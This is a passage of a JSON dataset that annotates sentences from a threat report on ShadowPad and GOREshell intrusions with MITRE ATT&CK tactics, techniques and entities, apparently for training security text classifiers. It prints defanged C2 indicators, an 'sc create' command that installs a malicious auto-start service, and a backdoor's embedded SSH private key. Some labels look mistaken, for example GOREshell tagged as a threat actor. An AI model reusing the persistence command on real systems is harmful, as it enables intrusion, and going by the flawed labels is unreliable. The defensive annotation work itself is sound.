domains and obscuring DNS traffic from monitoring systems.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" }, { "id": "T1568", "name": "Dynamic Resolution" } ], "procedure": "Use a domain and IP address for C2 communication over DNS over HTTPS while encoding queries to evade detection.", "entities": [ { "text": "uses the domain news.imaginerjp[.]com and the IP address 65.38.120[.]110 for C2 communication", "start": 12, "end": 105, "label": "Action" }, { "text": "leveraging DNS over HTTPS (DoH) in an attempt to evade detection by Base-64 encoding queried domains and obscuring DNS traffic from monitoring systems", "start": 107, "end": 257, "label": "Action" }, { "text": "news.imaginerjp[.]com", "start": 28, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "65.38.120[.]110", "start": 69, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s68-64297e", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "The malware uses the domain news.imaginerjp[.]com and the IP address 65.38.120[.]110 for C2 communication, leveraging DNS over HTTPS (DoH) in an attempt to evade detection by Base-64 encoding queried domains and obscuring DNS traffic from monitoring systems.", "sentence_text": "AppSov.exe\nis obfuscated using dispatcher routines that alter control flow, displacements placed after each invocation of these routines, and opaque predicates.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Obfuscate malware using control flow alteration and opaque predicates", "entities": [ { "text": "AppSov.exe", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "obfuscated ", "start": 14, "end": 25, "label": "Action" }, { "text": "alter control flow", "start": 56, "end": 74, "label": "Action" }, { "text": "opaque predicates", "start": 142, "end": 159, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s69-c74ad7", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "AppSov.exe\nis obfuscated using dispatcher routines that alter control flow, displacements placed after each invocation of these routines, and opaque predicates.", "sentence_text": "It is distributed with three modules: one with the ID 0x0A and two with the ID 0x20 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s70-66405d", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "It is distributed with three modules: one with the ID 0x0A and two with the ID 0x20 .", "sentence_text": "The ShadowPad module IDs designate different types of modules, including configuration data or code that implements malware functionalities such as injection or data theft.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Use modular malware with components for injection and data theft", "entities": [ { "text": "ShadowPad ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "injection ", "start": 148, "end": 158, "label": "Action" }, { "text": "data theft", "start": 161, "end": 171, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s71-891056", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "The ShadowPad module IDs designate different types of modules, including configuration data or code that implements malware functionalities such as injection or data theft.", "sentence_text": "For a detailed overview of the ScatterBrain obfuscation mechanism and additional ShadowPad implementation details, we refer to previous research by Google Threat Intelligence Group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s72-575f0e", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "For a detailed overview of the ScatterBrain obfuscation mechanism and additional ShadowPad implementation details, we refer to previous research by Google Threat Intelligence Group.", "sentence_text": "Activity B & C | A Global ShadowPad Operation Based on various implementation overlaps with AppSov.exe , including configuration data as well as custom decryption and integrity verification constant values, we identified multiple additional ShadowPad samples obfuscated using ScatterBee variants.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s73-f61d7f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "Activity B & C | A Global ShadowPad Operation Based on various implementation overlaps with AppSov.exe , including configuration data as well as custom decryption and integrity verification constant values, we identified multiple additional ShadowPad samples obfuscated using ScatterBee variants.", "sentence_text": "This also led to the discovery of related infrastructure, including the ShadowPad C2 servers dscriy.chtq[.]net and updata.dsqurey[.]com , as well as the suspected ShadowPad-related domains network.oossafe[.]com and notes.oossafe[.]com Some of the samples we identified differ in execution from AppSov.exe .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s74-a03583", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "This also led to the discovery of related infrastructure, including the ShadowPad C2 servers dscriy.chtq[.]net and updata.dsqurey[.]com , as well as the suspected ShadowPad-related domains network.oossafe[.]com and notes.oossafe[.]com Some of the samples we identified differ in execution from AppSov.exe .", "sentence_text": "Instead of embedding the full ShadowPad functionality and configuration within a single executable, they are implemented as Windows DLLs designed to be loaded by specific legitimate executables vulnerable to DLL hijacking.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "Implement malware as DLLs for loading via DLL hijacking of legitimate executables", "entities": [ { "text": "ShadowPad ", "start": 30, "end": 40, "label": "MalwareTool" }, { "text": "implemented as Windows DLLs", "start": 109, "end": 136, "label": "Action" }, { "text": "loaded by specific legitimate executables vulnerable to DLL hijacking", "start": 152, "end": 221, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s75-445c1c", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "Instead of embedding the full ShadowPad functionality and configuration within a single executable, they are implemented as Windows DLLs designed to be loaded by specific legitimate executables vulnerable to DLL hijacking.", "sentence_text": "These DLLs then load an external file with an eight-character name and the .tmp extension, for example 1D017DF2.tmp", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Load an external .tmp file from a hijacked DLL", "entities": [ { "text": "load an external file", "start": 16, "end": 37, "label": "Action" }, { "text": "eight-character name and the .tmp extension", "start": 46, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s76-956174", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "These DLLs then load an external file with an eight-character name and the .tmp extension, for example 1D017DF2.tmp", "sentence_text": "Using C2 netflow and SentinelOne telemetry data, we identified a broad range of victim organizations compromised by the ShadowPad samples we discovered.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Compromise organizations using ShadowPad", "entities": [ { "text": "compromised ", "start": 101, "end": 113, "label": "Action" }, { "text": "ShadowPad samples", "start": 120, "end": 137, "label": "MalwareTool" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s77-7cdbcf", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "Using C2 netflow and SentinelOne telemetry data, we identified a broad range of victim organizations compromised by the ShadowPad samples we discovered.", "sentence_text": "Among the victims was the IT services and logistics company that was managing hardware logistics for SentinelOne employees at the time (Activity C).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s78-1a7607", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "Among the victims was the IT services and logistics company that was managing hardware logistics for SentinelOne employees at the time (Activity C).", "sentence_text": "We suspect that the most common initial access vector involved the exploitation of Check Point gateway devices, consistent with previous research on this topic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s79-8c1ab4", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "We suspect that the most common initial access vector involved the exploitation of Check Point gateway devices, consistent with previous research on this topic.", "sentence_text": "We also observed communication to ShadowPad C2 servers originating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential exploitation of these systems as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s80-d93929", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "We also observed communication to ShadowPad C2 servers originating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential exploitation of these systems as well.", "sentence_text": "Technical Details", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s81-7a516b", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "Technical Details", "sentence_text": "| PurpleHaze", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s82-619724", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "| PurpleHaze", "sentence_text": "We present below technical details on intrusions that are part of the PurpleHaze threat cluster: the intrusion into the South Asian government entity in October 2024 (Activity D, the same organization compromised using ShadowPad in June 2024), the reconnaissance of SentinelOne infrastructure in October 2024 (Activity E), and the intrusion into the European media organization in September 2024 (Activity F).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s83-d4b128", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "We present below technical details on intrusions that are part of the PurpleHaze threat cluster: the intrusion into the South Asian government entity in October 2024 (Activity D, the same organization compromised using ShadowPad in June 2024), the reconnaissance of SentinelOne infrastructure in October 2024 (Activity E), and the intrusion into the European media organization in September 2024 (Activity F).", "sentence_text": "Activity D | GOREshell & a China-based ORB Network In early October 2024, we detected system reconnaissance and malware deployment activities on a workstation within the South Asian government entity.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1018", "name": "Remote System Discovery" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Conduct system reconnaissance and deploy malware on a government workstation", "entities": [ { "text": "reconnaissance ", "start": 93, "end": 108, "label": "Action" }, { "text": "malware deployment activities", "start": 112, "end": 141, "label": "Action" }, { "text": "workstation ", "start": 147, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "South Asian government entity", "start": 170, "end": 199, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s84-0b25d2", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "Activity D | GOREshell & a China-based ORB Network In early October 2024, we detected system reconnaissance and malware deployment activities on a workstation within the South Asian government entity.", "sentence_text": "The threat actor executed the ipconfig Windows command to query network configuration and established a connection to IP address 103.248.61[.]36 on port 443.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Execute ipconfig to query network configuration and connect to C2 server", "entities": [ { "text": "executed the ipconfig Windows command", "start": 17, "end": 54, "label": "Action" }, { "text": " query network configuration", "start": 57, "end": 85, "label": "Action" }, { "text": "established a connection", "start": 90, "end": 114, "label": "Action" }, { "text": "103.248.61[.]36 ", "start": 129, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "port 443", "start": 148, "end": 156, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s85-da6f16", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "The threat actor executed the ipconfig Windows command to query network configuration and established a connection to IP address 103.248.61[.]36 on port 443.", "sentence_text": "The adversary then created the C:\\Program Files\\VMware\\VGAuth directory and downloaded an archive file named VGAuth1.zip from 103.248.61[.]36 ; after extracting its contents into the VGAuth directory, the archive was deleted.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Create directory, download VGAuth1.zip from C2, extract contents, and delete archive", "entities": [ { "text": "C:\\Program Files\\VMware\\VGAuth", "start": 31, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "created ", "start": 19, "end": 27, "label": "Action" }, { "text": "downloaded an archive file", "start": 76, "end": 102, "label": "Action" }, { "text": "VGAuth1.zip", "start": 109, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "103.248.61[.]36", "start": 126, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "extracting ", "start": 150, "end": 161, "label": "Action" }, { "text": "archive was deleted", "start": 205, "end": 224, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s86-959546", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "The adversary then created the C:\\Program Files\\VMware\\VGAuth directory and downloaded an archive file named VGAuth1.zip from 103.248.61[.]36 ; after extracting its contents into the VGAuth directory, the archive was deleted.", "sentence_text": "The archive file contained two executables: a legitimate VGAuthService.exe executable and a malicious DLL file named glib-2.0.dll (original filename:\nlibglib-2.0-0.dll\n), which masquerades as a legitimate GLib–2.0 library file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.004", "name": "Masquerade Task or Service" } ], "procedure": "Masquerade malicious DLL as legitimate GLib library", "entities": [ { "text": "VGAuthService.exe", "start": 57, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "malicious DLL file named glib-2.0.dll", "start": 92, "end": 129, "label": "MalwareTool" }, { "text": "libglib-2.0-0.dll", "start": 150, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "masquerades as a legitimate GLib–2.0 library file", "start": 177, "end": 226, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s87-a0e5b3", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "The archive file contained two executables: a legitimate VGAuthService.exe executable and a malicious DLL file named glib-2.0.dll (original filename:\nlibglib-2.0-0.dll\n), which masquerades as a legitimate GLib–2.0 library file.", "sentence_text": "VGAuthService.exe\nimplements the VMware Guest Authentication Service.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s88-81a29e", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "VGAuthService.exe\nimplements the VMware Guest Authentication Service.", "sentence_text": "The threat actor deployed version 11.3.5.59284 , signed by VMWare and compiled on Tuesday, August 31, 2021, 06:14:07 UTC.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Deploy a legitimate VMWare executable", "entities": [ { "text": "deployed ", "start": 17, "end": 26, "label": "Action" }, { "text": "version 11.3.5.59284", "start": 26, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "signed by VMWare", "start": 49, "end": 65, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s89-39c3c8", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 89, "context_before": "The threat actor deployed version 11.3.5.59284 , signed by VMWare and compiled on Tuesday, August 31, 2021, 06:14:07 UTC.", "sentence_text": "This version is vulnerable to DLL hijacking.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s90-0dcfee", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "This version is vulnerable to DLL hijacking.", "sentence_text": "The threat actor then created a new Windows service named VGAuthService , which automatically starts upon system boot, runs the VGAuthService.exe executable, and displays as Alias Manager and Ticket Service .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "Create a Windows service (VGAuthService) that auto-starts on boot to run VGAuthService.exe", "entities": [ { "text": "created a new Windows service", "start": 22, "end": 51, "label": "Action" }, { "text": "VGAuthService", "start": 58, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "automatically starts upon system boot", "start": 80, "end": 117, "label": "Action" }, { "text": " VGAuthService.exe", "start": 127, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "Alias Manager and Ticket Service", "start": 174, "end": 206, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s91-c5ebdf", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "The threat actor then created a new Windows service named VGAuthService , which automatically starts upon system boot, runs the VGAuthService.exe executable, and displays as Alias Manager and Ticket Service .", "sentence_text": "When the service was started, VGAuthService.exe loaded and executed the malicious glib-2.0.dll library file.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "Load and execute malicious glib-2.0.dll via VGAuthService.exe", "entities": [ { "text": "VGAuthService.exe", "start": 30, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "loaded and executed", "start": 48, "end": 67, "label": "Action" }, { "text": "malicious glib-2.0.dll", "start": 72, "end": 94, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s92-5f95b3", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 92, "context_before": "When the service was started, VGAuthService.exe loaded and executed the malicious glib-2.0.dll library file.", "sentence_text": "sc create VGAuthService binPath= \"\\\"C:\\\\Program Files\\\\VMware\\\\\\VGAuth\\\\VGAuthService.exe\\\"\" start=auto error=ignore displayname=\"Alias Manager and Ticket Service\" glib-2.0.dll implements the GOREshell backdoor, which uses reverse_ssh functionalities to establish SSH connections to attacker-controlled endpoints.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "GOREshell backdoor uses reverse_ssh to establish SSH connections to attacker-controlled endpoints", "entities": [ { "text": "GOREshell ", "start": 192, "end": 202, "label": "ThreatActor" }, { "text": "glib-2.0.dll", "start": 164, "end": 176, "label": "MalwareTool" }, { "text": "reverse_ssh", "start": 223, "end": 234, "label": "MalwareTool" }, { "text": "attacker-controlled endpoints", "start": 283, "end": 312, "label": "Infrastructure_Indicator" }, { "text": "establish SSH connections", "start": 254, "end": 279, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s93-e3eb2a", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "sc create VGAuthService binPath= \"\\\"C:\\\\Program Files\\\\VMware\\\\\\VGAuth\\\\VGAuthService.exe\\\"\" start=auto error=ignore displayname=\"Alias Manager and Ticket Service\" glib-2.0.dll implements the GOREshell backdoor, which uses reverse_ssh functionalities to establish SSH connections to attacker-controlled endpoints.", "sentence_text": "It uses the cgo library to invoke C code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s94-b34915", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "It uses the cgo library to invoke C code.", "sentence_text": "glib-2.0.dll\ncontains a private SSH key used for establishing SSH connections to the threat actor’s C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "Uses a private SSH key for C2 connections", "entities": [ { "text": "glib-2.0.dll", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "C2 server", "start": 100, "end": 109, "label": "MalwareTool" }, { "text": "establishing SSH connections", "start": 49, "end": 77, "label": "Action" }, { "text": "contains a private SSH key", "start": 13, "end": 39, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s96-aa144f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 96, "context_before": "-----BEGIN", "sentence_text": "OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZWQyNTUxOQAAACABqioIxWKMLg7cKJuRt30HFKJuyTBVP7F6c6G7ozrcdwAAAIgRVxQaEVcUGgAAAAtzc2gtZWQyNTUxOQAAACABqioIxWKMLg7cKJuRt30HFKJuyTBVP7F6c6G7ozrcdwAAAECLzCu1ax/sxC6Vvt8/pkE+H2ryf9RtRqsyjs/1cL5k3QGqKgjFYowuDtwom5G3fQcUom7JMFU/sXpzobujOtx3AAAAAAECAwQF -----END", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s97-462793", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 97, "context_before": "OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZWQyNTUxOQAAACABqioIxWKMLg7cKJuRt30HFKJuyTBVP7F6c6G7ozrcdwAAAIgRVxQaEVcUGgAAAAtzc2gtZWQyNTUxOQAAACABqioIxWKMLg7cKJuRt30HFKJuyTBVP7F6c6G7ozrcdwAAAECLzCu1ax/sxC6Vvt8/pkE+H2ryf9RtRqsyjs/1cL5k3QGqKgjFYowuDtwom5G3fQcUom7JMFU/sXpzobujOtx3AAAAAAECAwQF -----END", "sentence_text": "OPENSSH PRIVATE KEY-----", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s98-8f21dc", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 98, "context_before": "OPENSSH PRIVATE KEY-----", "sentence_text": "The malware was configured to use downloads.trendav[.]vip for C2 purposes.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Configure malware to use a domain for command-and-control communication.", "entities": [ { "text": " downloads.trendav[.]vip", "start": 33, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "use downloads.trendav[.]vip for C2 purposes", "start": 30, "end": 73, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s99-38c6dd", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 99, "context_before": "The malware was configured to use downloads.trendav[.]vip for C2 purposes.", "sentence_text": "glib-2.0.dll\nestablishes SSH connections over the Websocket protocol ( wss[://]downloads.trendav[.]vip:443 ).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "Establishes SSH connections over the Websocket protocol", "entities": [ { "text": "glib-2.0.dll", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "wss[://]downloads.trendav[.]vip:443", "start": 71, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "establishes SSH connections", "start": 13, "end": 40, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s100-b2aac5", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 100, "context_before": "glib-2.0.dll\nestablishes SSH connections over the Websocket protocol ( wss[://]downloads.trendav[.]vip:443 ).", "sentence_text": "The threat actor deployed GOREshell variants not only on Windows systems but also on Linux.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Deploy GOREshell variants on Windows and Linux systems.", "entities": [ { "text": "GOREshell", "start": 26, "end": 35, "label": "MalwareTool" }, { "text": "deployed GOREshell variants", "start": 17, "end": 44, "label": "Action" }, { "text": "Windows systems", "start": 57, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "Linux", "start": 85, "end": 90, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s101-9002bb", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 101, "context_before": "The threat actor deployed GOREshell variants not only on Windows systems but also on Linux.", "sentence_text": "This includes two samples: one masquerading as the snapd Linux service and the other as the update-notifier service.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Masquerade GOREshell samples as the snapd Linux service and update-notifier service.", "entities": [ { "text": "masquerading as the snapd Linux service", "start": 31, "end": 70, "label": "Action" }, { "text": "snapd Linux service", "start": 51, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "update-notifier service", "start": 92, "end": 115, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s102-e39723", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 102, "context_before": "This includes two samples: one masquerading as the snapd Linux service and the other as the update-notifier service.", "sentence_text": "The threat actor deployed both samples as Linux services, which included creating service configuration files, such as /usr/lib/systemd/system/update-notifier.service In contrast to update-notifier , which is obfuscated using Garble and packed with UPX, snapd is not obfuscated.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Deployed samples as Linux services by creating service configuration files", "entities": [ { "text": "update-notifier", "start": 182, "end": 197, "label": "MalwareTool" }, { "text": "snapd ", "start": 254, "end": 260, "label": "MalwareTool" }, { "text": "/usr/lib/systemd/system/update-notifier.service", "start": 119, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "deployed ", "start": 17, "end": 26, "label": "Action" }, { "text": "creating service configuration files", "start": 73, "end": 109, "label": "Action" }, { "text": "obfuscated ", "start": 209, "end": 220, "label": "Action" }, { "text": "packed ", "start": 237, "end": 244, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s103-d2c063", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 103, "context_before": "The threat actor deployed both samples as Linux services, which included creating service configuration files, such as /usr/lib/systemd/system/update-notifier.service In contrast to update-notifier , which is obfuscated using Garble and packed with UPX, snapd is not obfuscated.", "sentence_text": "Both samples use epp.navy[.]ddns[.]info as their C2 servers and are configured to proxy connections through a local IP address over port 8080.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Use a domain as a C2 server and proxy connections through a local IP address over port 8080.", "entities": [ { "text": "use epp.navy[.]ddns[.]info as their C2 servers", "start": 13, "end": 59, "label": "Action" }, { "text": "proxy connections", "start": 82, "end": 99, "label": "Action" }, { "text": "epp.navy[.]ddns[.]info", "start": 17, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "local IP address", "start": 110, "end": 126, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s104-85a3e3", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 104, "context_before": "Both samples use epp.navy[.]ddns[.]info as their C2 servers and are configured to proxy connections through a local IP address over port 8080.", "sentence_text": "Additionally, both samples store the same private SSH key as glib-2.0.dll Based on the private key stored in glib-2.0.dll , snapd , and update-notifier , we discovered an additional GOREshell variant, which was uploaded on a malware sharing platform in September 2023.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Stored the same private SSH key across multiple samples", "entities": [ { "text": "glib-2.0.dll", "start": 109, "end": 121, "label": "MalwareTool" }, { "text": "snapd ", "start": 124, "end": 130, "label": "MalwareTool" }, { "text": "update-notifier", "start": 136, "end": 151, "label": "MalwareTool" }, { "text": "GOREshell variant", "start": 182, "end": 199, "label": "MalwareTool" }, { "text": "malware sharing platform", "start": 225, "end": 249, "label": "Infrastructure_Indicator" }, { "text": "store ", "start": 27, "end": 33, "label": "Action" }, { "text": "discovered ", "start": 157, "end": 168, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s105-e62f0e", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 105, "context_before": "Additionally, both samples store the same private SSH key as glib-2.0.dll Based on the private key stored in glib-2.0.dll , snapd , and update-notifier , we discovered an additional GOREshell variant, which was uploaded on a malware sharing platform in September 2023.", "sentence_text": "This GOREshell variant is implemented as a tapisrv.dll library file (Microsoft Windows Telephony Server) and loaded as a Windows service by the svchost.exe service container process.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.003", "name": "Windows Service" } ], "procedure": "Loaded a malicious tapisrv.dll as a Windows service via svchost.exe", "entities": [ { "text": 